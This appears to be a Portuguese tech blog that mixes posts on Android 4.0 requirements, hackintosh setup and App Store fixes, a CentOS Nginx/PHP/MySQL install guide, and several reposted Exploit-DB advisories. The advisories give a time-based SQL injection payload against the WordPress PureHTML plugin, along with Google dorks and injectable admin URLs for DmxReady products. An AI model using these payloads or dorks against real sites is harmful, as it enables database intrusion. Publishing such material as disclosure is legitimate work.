Quais os recursos necessários para rodar Google Android 4.0 "Ice Cream Sandwich"

Standard

Oficialmente, até a data de hoje a Google não divulgou quais os requerimentos mínimos para se ter o Android 4.0 cujo codenome é Ice Cream rodando de forma estável para o público web como nós (eu, tu e o app… rsrsrs) , porém, segundo fontes internacionais, há uma informação abstante animadora para usuários do android, o hardware necessário não será tão potente assim em vista do breve lançamento, o que chega a ser curioso.

Vamos aos requerimentos mínimos para rodar?

1 – Processador com 1ghz,

2 – 512 mb de ram,

3 – GPU (indefinida).

Esta informação veio de uma nota de releases da Sony, a mesma falou que seus smartphones de alto desempenho (x10 Arc, por exemplo) vão receber a atualização sem problemas. Da linha Xperia, acreditamos que somente os que tem hardware menor que os dados passados acima não receberão a update,  segundo a Sony detalhou sobre o android 4.0.

Ao que parece, tudo indica que em termos de hardware todos que possuem: Motorola Milestone 2, Motorola Defy, Motorola Atrix, Droid 2, Galaxy i9000, Sony X10 ou superiores receberão o update tranquilamente. (aparentemente vão rodar)

Segundo a mesma fonte, baseado na aparelhagem, o Xperia Arc possui um hardware não muito potente (referimos-nos aos mais potentes do mercado) assim como uma GPU “não muito poderosa” (nos referimos ao nível máximo do mercado atual), ou seja, no caso do Milestone 2, a GPU é OMAP 3620, que já trás bons jogos e bom nível de captura. Ao que parece, talvez seremos contemplados com esta glória sim!

No caso do Sony Xperia Arc, sua GPU é Adreno 205 (não é a mais potente do mercado, mas anda bem), mas foi confirmado que roda, presumimos que rodará nos aparelhos que citamos. (nem que seja com lag, por favor GOOGLE!)

A nota vem do site SOMobile, que coloca a notícia na Íntegra neste link -> http://www.somobile.co.uk/news/2011/09/08/sony-ericsson-current-gen-xperia-phones-will-get-android-4-0/#

Estamos torcendo para que a informação venha cair como luva nas mãos dos donos de Smartphones com 1ghz de clock, pois será maravilhoso dar vida aos “antigs smartphones”.
Abraços a todos e qualquer sujestão/suspeita usem os comentários e iremos atualizar o texto de acordo com a relevância dos comentários.

Para quem quer acompanhar as GPUS dos smartphones mais conhecidos acessem: http://en.wikipedia.org/wiki/Comparison_of_Android_devices

 

 

Itens básicos para entrar no mundo Hackintosh

Standard

Olá galera… tudo na paz?

Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês  nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh…..

Não quero ser chato, muito menos egoista… mas há certas coisas que são indispensáveis a se saber quando se quer mexer com algo tão complexo… (Hackintosh)

Ex:

1 – Saber ao menos o básico sobre hardware (ou ao menos saber onde procurar)

2 – Configurações básicas e avançadas de BIOS

3 – Noções básicas de sistemas Linux (é dispensável, mas isso facilita muito o entendimento de comandos e dos sistema de diretórios do Mac OS)

4 – O principal de tudo, força de vontade e saber bons lugares para se procurar gente que queira lhe ajudar

Está parecendo anuncio de vaga de emprego, hauhauahuah mas não é….. são apenas aspectos básicos e que acho essenciais ao Hackitnosher

Alguns sites com informação de responsa:

http://www.appunix.com.br

http://www.hmbt.org

http://www.hackintosh.com

http://blog.nawcom.com/

http://www/hackintosh.org

http://www.lifehacker.com

http://tonymacx86.blogspot.com/

http://www.tomshardware.com/

http://forum.voodooprojects.org/

http://www.kexts.com

http://wiki.osx86project.org/wiki/index.php/Main_Page

http://www.insanelymac.com/

Não necessariamente nessa ordem, esse são sites onde seus membros escrevem materiais de responsa sobre Mac OS X, Hackintosh…. inclusive desenvolvem ferramentas que facilitam a vida de NÓS entusiastas do mundo Hackintosh……  o principal desse post é dizer que não adianta o cara querer entrar no mundo Hackintosh sem saber ao menos como dar boot via cd ou pendrive…. fica impossível galera, não dá pra dar suporte ou ao menos ajudar pessoas que não sabem o mínimo de informática…. Sinceramente não sei como serei interpretado ao escrever esse artigo mas, espero que não me entendam mal, mas quero apenas que facilitem minha vida ao lhes ajudar e a suas ao serem ajudados…..  Aprendi muito com a cominidade Linux e principalmente com a comunidade Hackintosh…. Todos querem ajudar mas não somos curso de informática….. não estamos aqui para ensinar informática, vamos ajudar a resolver qualquer tipo de problema (ou aos menos vamos nos esforçar bastante para isso)… mas nos procurar sem saber ao menos com se entra na BIOS de um PC, isso é muito constrangedor…. Eu pelo menos não consigo maltratar ninguém…. nem ao menos negar ajuda, mas se vocês já frequentaram outros fóruns por ai, devem perceber que existem moderadores e/ou usuários mais avançados que fazem esses inesperientes usuários perderem a vontade de entrar/continuar nesse mundo do Hackitnosh…..  Resolvi a alguns dias conversando com meu grande amigo Little_Oak que vamos tornar o AppUnix um portal com conteúdo para todo tipo de usuário Hackintosh…. desde o cara que não sabe absolutamente nada, até o usuário Mac/Hackintosh experiente que precisa resolver um problema em seu Mac ou Hackitnosh e não sabe onde encontrar a resposta….. Eu particularmente acho que antes de entrar nesse mundo hackintosh todos NÓS deveriamos conhecer as maravilhas do mundo Linux….. Eu, Doooguinha comecei a mexer a ser um entusiasta no Mundo Mac (diga-se Hackitnosh) um pouco antes de começar no Mundo Linux…. até que surgiu a vontade/necessidade de me diferenciar dos amigos sysadmins de plantão…… Grande maioria de nossos amigos sysadmins somente conhecem Window$…. Infelizmente é assim….. Hoje tenho mais ou menos 3 anos que sou usuários Linux… administro Redes mistas, e o conhecimento que o mundo Linux me trouxe foi um dos pontos principais à minha adaptação tão rápida aos conceitos  do mundo Hackintosh…. ficou tudo muito mais claro do que quando eu não conhecia nada de Linux…. não sou expert em Linux nem em Mac OS… mas me viro bem em qualquer dos ambientes…. pretendo no final do ano tirar minha primeira Certificação Linux (LPI nível 1) e no próximo ano tirar LPI nível 2….. Costumo dizer que “Uso Mac OS, estudo Linux e respeito windows (por ter uma gangue muito grande e poder querer juntar sua turminha e me pegar na rua)“ …

Nos ajudem leitores, vamos fazer desse portal um referencial aos que querem entrar nesse mundo de hackitnosh, estou completamente comprometido em deixar isso aqui ideal aos que não tem experiência alguma nessa área… A indicação de how tos/dúvidas por meio de vocês leitores será importantíssima para que nosso BLOG vire um ponto de encontro entre usuários de todos os níveis do mundo hackintosh…. contamos de verdade com a colaboração de vocês.

Gostou? Comente, complemente e espalhe! 

Obrigado a todos….

 

WordPress PureHTML plugin

Standard


# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

Como instalar Nginx PHP5 e Mysql no CentOS 5.6

Standard

A pronúncia correta do Nginx é “engin-ex”, mas vamos nos ater aos comandos que é o melhor que podemos fazer, né? NÃO sem antes falar que essa besteirinha segura “somente” milhões de acessos por dia ao site WordPress, por isso CONFIE e USE nginx sem QUALQUER medo! (existe plugin pago e grátis para o Cpanel, mas recomendamos que use o plugin free sob CENTOS senão seu cpanel vai sobrescrever os confs de vhosts do nginx).

Primeiro estou imaginando que seu ip será igual o meu -> 10.0.0.1.

Vamos instalar o Mysql?

root@appunixlabs:# yum clean all && yum update -y && yum install mysql mysql-server -y

O -y acima manda o yum instalar as coisas sem pedir confirmações.

Assim que terminarmos a instalação deveremos dar autoridade ao mysql para que possa iniciar assim que o server for inicializado (estilo pós reboot 😛 ):

root@appunixlabs:# chkconfig –levels 235 mysqld on

E vamos inicializar o bichão:

root@appunixlabs:# /etc/init.d/mysqld start

Se quisermos verificar se a porta do Mysql está aberta (funcionando) podemos usar o netstat -tap | grep mysql.

Agora precisamos editar o conf do mysql para deixar a conectividade dele filé:

root@appunixlabs:# vim /etc/my.cnf

Devemos achar a linha skip-networking e colocar um sinal de libra (#) para comentar essa instrução:

#skip-networking

Podemos localizar este termo usando / e digitando skip-networking no modo comando do vim (basta apertar o ESC e depois apertar /).

Vamos validar o trem?

root@appunixlabs:# /etc/init.d/mysqld restart

Devemos agora aplicar as correções de segurança do Mysql para desativar test user, definir senha de root… Bora simbora?

root@appunixlabs:# mysql_secure_installation

NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL
SERVERS IN PRODUCTION USE! PLEASE READ EACH STEP CAREFULLY!

In order to log into MySQL to secure it, we’ll need the current
password for the root user. If you’ve just installed MySQL, and
you haven’t set the root password yet, the password will be blank,
so you should just press enter here.

Enter current password for root (enter for none):
OK, successfully used password, moving on…

Setting the root password ensures that nobody can log into the MySQL
root user without the proper authorisation.

Set root password? [Y/n] < – APERTE ENTER New password: <– DIGITE A SENHA DE ROOT DO MYSQL Re-enter new password: <– REPITA A SENHA DE ROOT DO MYSQL Password updated successfully! Reloading privilege tables.. … Success! By default, a MySQL installation has an anonymous user, allowing anyone to log into MySQL without having to have a user account created for them. This is intended only for testing, and to make the installation go a bit smoother. You should remove them before moving into a production environment. Remove anonymous users? [Y/n] <– ENTER PARA CONFIRMAR … Success! Normally, root should only be allowed to connect from ’localhost’. This ensures that someone cannot guess at the root password from the network. Disallow root login remotely? [Y/n] <– ENTER PARA CONFIRMAR … Success! By default, MySQL comes with a database named ’test’ that anyone can access. This is also intended only for testing, and should be removed before moving into a production environment. Remove test database and access to it? [Y/n] <– ENTER PARA CONFIRMAR - Dropping test database… … Success! - Removing privileges on test database… … Success! Reloading the privilege tables will ensure that all changes made so far will take effect immediately. Reload privilege tables now? [Y/n] <– ENTER PARA CONFIRMAR … Success! Cleaning up… All done! If you’ve completed all of the above steps, your MySQL installation should now be secure. Thanks for using MySQL!

Hora de instalarmos o Nginx, bora simbora? Pera! Antes de irmos temos de ajustar o repositório primeiro, para isto temos de fazer o seguinte:

root@appunixlabs:# cd /etc/yum.repos.d/

root@appunixlabs:# wget http://centos.karan.org/kbsingh-CentOS-Extras.repo

Pronto, precisamos agora somente editar o conf do repositório extra:

root@appunixlabs:# vim /etc/yum.repos.d/kbsingh-CentOS-Extras.repo

Precisamos deixar nosso conf parecido com este:

# pkgs in the -Testing repo are not gpg signed
[kbs-CentOS-Testing]
name=CentOS.Karan.Org-EL$releasever - Testing
gpgcheck=0
gpgkey=http://centos.karan.org/RPM-GPG-KEY-karan.org.txt
enabled=1
baseurl=http://centos.karan.org/el$releasever/extras/testing/$basearch/RPMS/

No gpgcheck temos de deixar 1.

Salvando e saindo do arquivo iremos deixar a casa arrumada:

root@appunixlabs:# yum update && yum install nginx -y

Agora teremos de colocar o nginx com direito de iniciar-se no momento do boot do server e depois disto validar este parâmetro:

root@appunixlabs:# chkconfig –levels 235 nginx on
root@appunixlabs:# /etc/init.d/nginx start

Para conferirmos que ficou filé basta abrir o navegador e digitar http://10.0.0.1, isto vai mostrar o container moendo :P.

Agora precisamos instalar o php, integrá-lo e ativar o suporte fastcgi. Para isto iremos abusar do yum (pra variar):

root@appunixlabs:# yum install lighttpd-fastcgi php-cli php-mysql php-gd php-imap php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-mcrypt php-mssql php-snmp php-soap php-tidy -y

Agora precisamos editar o php.ini para dar suporte ao fastcgi:

root@appunixlabs:# vim /etc/php.ini

No padrão cgi.fix_pathinfo = 0 deixe cgi.fix_pathinfo = 1 (use a localização do vim a qual citamos neste post).

Vamos inicar agora o suporte ao FastCgi do PHP na porta 9000:

root@appunixlabs:# /usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u nginx -g nginx -f /usr/bin/php-cgi -P /var/run/fastcgi-php.pid

Agora devemos colocar essa instrução junto ao rc.local pra o bicho iniciar sozinho no momento do boot:

root@appunixlabs:# vim /etc/rc.local

Coloque isto no arquivo: /usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u nginx -g nginx -f /usr/bin/php-cgi -P /var/run/fastcgi-php.pid

Precisamos corrigir o keepalive do conf do nginx e mais coisas :(.

[ ... início do arquivo ... ]
worker_processes 5;
[... meio do arquivo ...]
keepalive_timeout 2;
[... fim do arquivo ...]

Precisamos criar o nosso default host :P, para isto temos de mudar a área do container do server:

server {
listen 80;
server_name _;

#charset koi8-r;

#access_log logs/host.access.log main;

location / {
root /usr/share/nginx/html;
index index.php index.html index.htm;
}

error_page 404 /404.html;
location = /404.html {
root /usr/share/nginx/html;
}

# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}

# proxy the PHP scripts to Apache listening on 127.0.0.1:80
#
#location ~ .php$ {
# proxy_pass http://127.0.0.1;
#}

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ .php$ {
root /usr/share/nginx/html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /usr/share/nginx/html$fastcgi_script_name;
include fastcgi_params;
}

# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
location ~ /.ht {
deny all;
}
}

server_name é a parte que valida nome canônico (www.qualquercoisa.com.br)
location / adicionamos index.php como sendo prioridade na abertura de arquivos (o default da vida).
A pasta de arquivos (o que seria um public_html ou www, ou ainda um httpdocs da vida) é /usr/share/nginx/html. (document root)
O principal deste arquivo é esta parte -> location ~ .php$ {}, devemos descomentar a mesma para que esteja validada.
Se não mudarmos fastcgi_param para fastcgi_param SCRIPT_FILENAME /usr/share/nginx/html$fastcgi_script_name; o php não conseguirá interpretar os scripts subjacentes no path (document root).

Bora meter o pau e ver como tudo ficou bombado?

root@appunixlabs:# /etc/init.d/nginx restart

E para ver que a parada está de fato funcionando/bombando/matando a pau devemos usar qualquer coisa do php para interpretação (testes), podemos usar o phpinfo mesmo. Para isto faça o seguinte:

root@appunixlabs:# vim /usr/share/nginx/html/index.php

Dentro dele coloque o seguinte:

< ?php phpinfo(); ?>

Depois disso, para testificarmos que a parada tá rodando devemos acessar por nosso navegador http://10.0.0.1/index.php

Pronto!

Fontes:

nginx: http://nginx.net/
nginx Wiki: http://wiki.codemongers.com/Main
PHP: http://www.php.net/
MySQL: http://www.mysql.com/
CentOS: http://www.centos.org/
How2Forge: http://migre.me/5rRVS

Como resolver problema | erro da AppStore no Hackintosh | Mac OS X Lion

Standard

Olá galera tudo na paz?

Hoje galera vou dar possíveis soluções para um problema que pelo que vi após o aparecimento de um certo Leão que nossa querida Apple soltou por ai vem acontecendo com frequência….

“Your device or computer could not be verified.Contact support for assistance help”

Com Mac OS X Lion, simplismente todos os hardwares que mexi deram essa mensagem ao tentar baixar alguma coisa na app store, nesse artigo vou passar possíveis soluções para resolver tal problema…. Vou confessar a você fiquei quase uma semana tentando resolver esse problema…. tentei várias soluções que para mim não surtiram muito efeito…. vou passar todas e na ordem que acho mais plausível de serem tentadas…. Todas essas soluções envolvem a edição do arquivo com.apple.Boot.plist que fica dentro da pasta Extra na rais de seu HD, temos esse mesmo arquivo na pasta /Library/Preferences/SystemConfiguration, caso essas dicas não dêm certo pelo com.Boot.apple.plist da Extra aconselho a tentativa com com.Boot.apple.plist  do Library/Preferences/SystemConfiguration …. vamos lá então….

OBS: Você não conseguirá editar esse arquivo dentro da pasta Extra ou dentro da pasta /Library/Preferences/SystemConfiguration… será necessário a criação de uma cópia do mesmo em outro local…. por padrão eu crio na Mesa, mas fica a seu critério….

Outra coisa a se lembrar é que todas as dicas aqui postadas foram usadas tendo como bootloader o Chameleon 1020 HMBT, se você usa outro bootloader talvez não seja da mesma a sua solução, talvez até sejam a mesma solução, mas em arquivos de configuração diferentes….

Vamos lá, a primeira coisa a se tentar é, inserir EthernetBuiltIn=Yes no com.Boot.apple.plist, ficando assim

 

<key>EthernetBuiltIn</key>

<string>Yes</string>

 

Após cada tentativa é preciso reboot da máquina….

-Doooguinha não due certo par mim, continuo recebendo “Your device or computer could not be verified.Contact support for assistance help”

Vamos a segunda solução possível… no mesmo arquivo, inserir PCIRoot=0 ou PCIRoot=1, aconselho o Lizard para ficar mais fácil saber que binário utilizar…. Baixe-o aqui  ao executar o aplicativo, verá uma interface igual a essa

Lizard_00

 

Em PCIRoot clique no botão Auto-detect value receberá um alerta dizendo o valor correto a se usar

Lizard_01

 

Agora vá até seu com.Boot.apple.plist e insira da seguinte forma (ai vai depender do valor dado pelo Lizard, mas já posso adiantar que em meus casos deu sempre 0 quando coloquei 1 fiquei sem rede… fica a dica)

 

<key>PCIRoot</key>

<string>0</string>

 

*caso seu Lizard acuse o valor 0(zero)

 

<key>PCIRoot</key>

<string>1</string>

 

*casp seu Lizard acuse o valor 1(um)

 

Tente tbm utilizando os mesmo valores utilizando PCIRootUID=0 ou PCIRootUID=1, ficando

 

<key>PCIRootUID</key>

<string>0</string>

 

ou

 

<key>PCIRootUID</key>

<string>1</string>

 

Lembrando galera…. tem que ter persistência…. eu mesmo tentei todas as combinações possíveis nessas opções acima…. TODAS mesmo….. mas nem uma infelizmente deu certo pra mim…, agora vou dar de lambuja pra você a solução e acho que atenderá muita gente, vamos utilizar o OSXTools para tal…. baixe-o Aqui

Pra você que tem um ambiante parecido com o meu( Asus+Intel+Geforce+Lion subindo em 64Bits), no meu caso possuo uma GeForce 9800GT 1024MB 256bits… para ativação no Mac OS X Lion foi necessária apenas GraphicsEnabler=Yes. Agora para conseguir sanar nosso problema aconselho que utilize a NVEnabler64 (isso para minha primeira indicação de solução para o problema)…

Caso você tenha um ambiente parecido com o eu, faço o seguinte então…. instale essa kext NVEnabler64 utilizando Kext Wizard… após instalar… como de prache pesso que repare as permissões (faça utilizando o próprio Kext Wizard)….. beleza…. agora vamos ao OSXTools, ao executá-lo verá uma interface assim

OSXTools

 

Na parte de baixo do aplicativo verá Add EFI Strings/Boot Flag

OSXTools_1

 

Clique no mesmo e chegará a essa interface

OSXTools_2

 

Na parte superior da tela clique em Ethernet Strings

OSXTools_3

 

Chegará em uma tela onde o aplicativo já fez tudo pra você….

OSXTools_4

 

Utilizaremos somente esse código Hexadecimal em nossa solução

OSXTools_5

 

Copie-o para a área de tranferência

OSXTools_6

 

utilize-o no com.Boot.apple.plist da seguinte forma

 

 <key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>4b00000001000000010000003f000000010000

0002010c00d041030a0000000001010600011c01010600

00007fff0400160000006200750069006c0074002d0069

006e0000000500000001</string>

 

Salve-o (caso precise, pois no Lion tem autosave e você não precisará salvá-lo manualmente), substitua o com.Boot.apple.plist de dentro da pasta Extra ou da pasta /Library/Preferences/SystemConfiguration…. reboot  e pronto… já pode usar seu AppStore até se cansar…. eu vou ser sincero…. só queria conseguir utilizar o AppStore porque estou começando a mexer com desenvolviemnto para  Mac OS | iOS ai ficar baixando essas coisa de lugares inseguro não dá né galera…. mas beleza…. ai você deve estar se perguntando…. Doooguinha, meu vídeo só funciona com String de vídeo… como irei fazer se o divice-properties já está utilizando a string da Ethernet…. calma meu caro… eu te falo….

Primeiro gere a string de vídeo com o programa de sua preferência, aqui utilizo para vídeo sempre o EFI Studio, que tem essa cara…

EFI

 

Selecione sua placa de vídeo na Lista

EFI_1

 

Clique em Add Device

EFI_2

 

Na tela seguinte clique no canto inferior direito em Save Hex

EFI_3

 

Será solicitado local para salvamento do arquivo, faça como preferir

EFI_4

 

Agora você já pode fechar o EFI Studio (ou outro qualquer que esteja usando)…. Vamos ao OSXTools… naquela tela que pegamos a string de Ethernet

Ethernet_String

 

Na parte superior dessa tela clique em Save as Hex

Ethernet_string_1

 

Será solicitado um nome

Ethernet_String_2

 

Um local onde salvar

Ethernet_String_3

 

Receberá mensagem de sucesso

Ethernet_String_4

 

Feche a tela da string de Ethernet voltando a essa tela

Combine_Hexa

 

No canto superior direito existe um Ícone Combine Hex Strings, clique nele

Combine_Hexa_1

 

Chegará nessa tela

Combine_Hexa_2

 

No canto superior esquerdo clicando em Chose Files você irá selecionar os Hexa decimais que você gerou referente a seus Hardwares

Combine_Hexa_3

 

Como puderam ver, meus Hexa Decimais foram salvos na Mesa

Comnie_Hexa_4

 

Agora escolha os Hexas (desculpem a quantidade de arquivos na Mesa, aquilo são screens Shot para fazer esse how to além de kexts para desenvolvimento de pacotes posteriores para facilitar a vida de vocês…..

Combine_Hexa_5

 

Podem ver na tela que ele gerou um Hexadecimal GIGANTE…. agora mescladno o Hexa do Vídeo e o Hexa da Ethernet…. bom, agora vamos pegar essa string copiar para a área de tranferência (Command+C)

Combine_Hexa_6

 

Agora vá até seu com.Boot.apple.plist e insira as seguintes linhas

<key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>1004000001000000020000003f0000000100000002010
c00d041030a0000000001010600011c0101060000007fff04001600
00006200750069006c0074002d0069006e0000000500000001c5
0300001500000002010c00d041030a0000000001010600000101
01060000007fff04003a000000400032002c00680077007300650
06e0073006f0072002d0070006100720061006d0073002d007600
65007200730069006f006e00000008000000000000022200000
0400032002c006400650076006900630065005f0074007900700
065000000120000004e5644412c6770752d64696f64650e0000004
e00560050004d0000002000000001000000000000000000000
0000000000000000000000000000000001e00000072006f006
d002d007200650076006900730069006f006e00000009000000
3331373261100000004e00560043004100500000001800000004
000000000003000c0000000000000700000000220000004000
32002c002300730069007a0065002d00630065006c006c007300
0000080000000000000022000000400030002c006400650076
006900630065005f00740079007000650000000b000000646973
706c6179100000006d006f00640065006c0000001e0000004e564
9444941204765466f7263652039383030204754204546491400000
0400030002c006e0061006d0065000000120000004e5644412c4
46973706c61792d4120000000400032002c0063006f006d007000
61007400690062006c0065000000160000004e5644412c73656e7
36f722d706172656e7414000000400031002c006e0061006d00650
00000120000004e5644412c446973706c61792d421200000040003
2002c00720065006700000008000000000000021c0000006400
650076006900630065005f007400790070006500000010000000
4e5644412c4765466f72636520000000400031002c0063006f006d
00700061007400690062006c00650000000e0000004e5644412c
4e564d616326000000400032002c002300610064007200650073
0073002d00630065006c006c00730000000800000000000001
0e0000006e0061006d00650000000f0000004e5644412c506172
656e7422000000400031002c006400650076006900630065005f
00740079007000650000000b000000646973706c617920000000
400030002c0063006f006d00700061007400690062006c006500
00000e0000004e5644412c4e564d6163220000005600520041004
d002c0074006f00740061006c00730069007a006500000008000
0000000004036000000400032002c0068007700630074007200
6c002d0070006100720061006d0073002d007600650072007300
69006f006e000000080000000000000214000000400032002c0
06e0061006d00650000001100000073656e736f722d706172656e74

</string>

**Pra não ficar desconfigurado no BLOG precisei fazer ajustes manuais na String… mas usem de acordo com o resultado obtido por ai….

Salve, substituia o com.Boot.apple.plist da pasta Extra ou de Library/Preferences/SystemConfiguration, reinicie sua máquina e faça o teste para ver se está tudo dentro do que nosso how-to lhe propôe… que é conseguir utilizar AppStore em seu Hackintosh… Outra coisa…. tbm existe uma solução no site da própria apple que é a de Excluir o arquivo NetworkInterfaces.plist da pasta Library/Preferences/SystemConfiguration …. mas essa só aconselho se você tiver um pouco de conhecimeno para adicionar novamente as interfaces de rede…. pois com a exclusão desse arquivo você ficará sem interfaces de rede disponíveis lá em preferências do Sitema e consequentemente terá que adicionar todas na mão…. ai fica a seu critério…. fazer ou não vai depender do seu conhecimento para reverter o que a exclusão desse aquivo acarretará…. É isso galera espero que ajude a vocês…. sofri muuito com essa besteira e espera sinceramente que nossos leitores não tenham o mesmo problema que tive….

Espero que dentre as soluções proposta para sanar esse problema você consiga resolver o seu…. Caso não… infelizmente eu não sei como fazer…. Só pra constar nos Autos, essa solução tbm fez com que minha Wireless conseguisse acesso ao AppStore, portanto tornou-se uma solução completa….. resolveu por completo meu problema……Caso tenha dúvida de como inserir essas linhas na qual vou citando aqui… vou deixar para download meu com.Boot.apple.plist… ai é só abrir e verificar como ficou….

Baixe Aqui

Lembrando que utilizei somente string para Ethernet e para vídeo utilizei a kext NVEnabler64

Bom proveito galera…. abraço!!!!!! 😀

Gostou? Comente, complemente e espalhe!

 

iOS 4.3.4 com recursos antihacking e jailbreaking

Standard

Segundo Slashdot, a versão 4.3.4 do iOS está vindo com recursos antihacking e com travamento bem elaborado contra jailbreaking. Os equipamentos que estarão com uso desta nova versão liberada pela Apple são: iPhone 4, 3GS, iPad 2, 1, e iPod Touch.

Para conferir toda a matéria na íntegra acesse: http://www.gizmocrazed.com/2011/07/apple-releases-ios-4-3-4-prevents-hacking-jailbreaking/

Ao que já se confirma, algumas pessoas afirmam que é possível nesta nova versão o jailbreaking usando ferramentas como RedsnOw e PwnageTool.

🙂

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

Standard

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_faqsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=faqs-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

———————————————————————————————————
Bug;

http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK]

DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Exploit Title:DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_contactusmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=contact-us-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK]

DMXReady Registration Manager v1.2 SQL Injection Vulneratbility

# Exploit Title: DMXReady Registration Manager v1.2 SQL Injection
Vulneratbility
# Google Dork: inurl:inc_registrationmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=registration-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/RegistrationManager/update.asp?MemberID=xx [ SQL

# Exploit Title: DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility
# Google Dork: inurl:inc_catalogmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=catalog-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————————————-
Bug details;

http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK]

DmxReady News Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady News Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_newsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=news-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-
Bug ;

http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK]

Fontes: http://www.exploit-db.com/exploits/17480/
http://www.exploit-db.com/exploits/17479/
http://www.exploit-db.com/exploits/17478/
http://www.exploit-db.com/exploits/17475/
http://www.exploit-db.com/exploits/17475/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_documentlibrarymanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=document-library-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=account-list-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
---------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17483/

DmxReady Links Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Links Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_linksmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=links-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
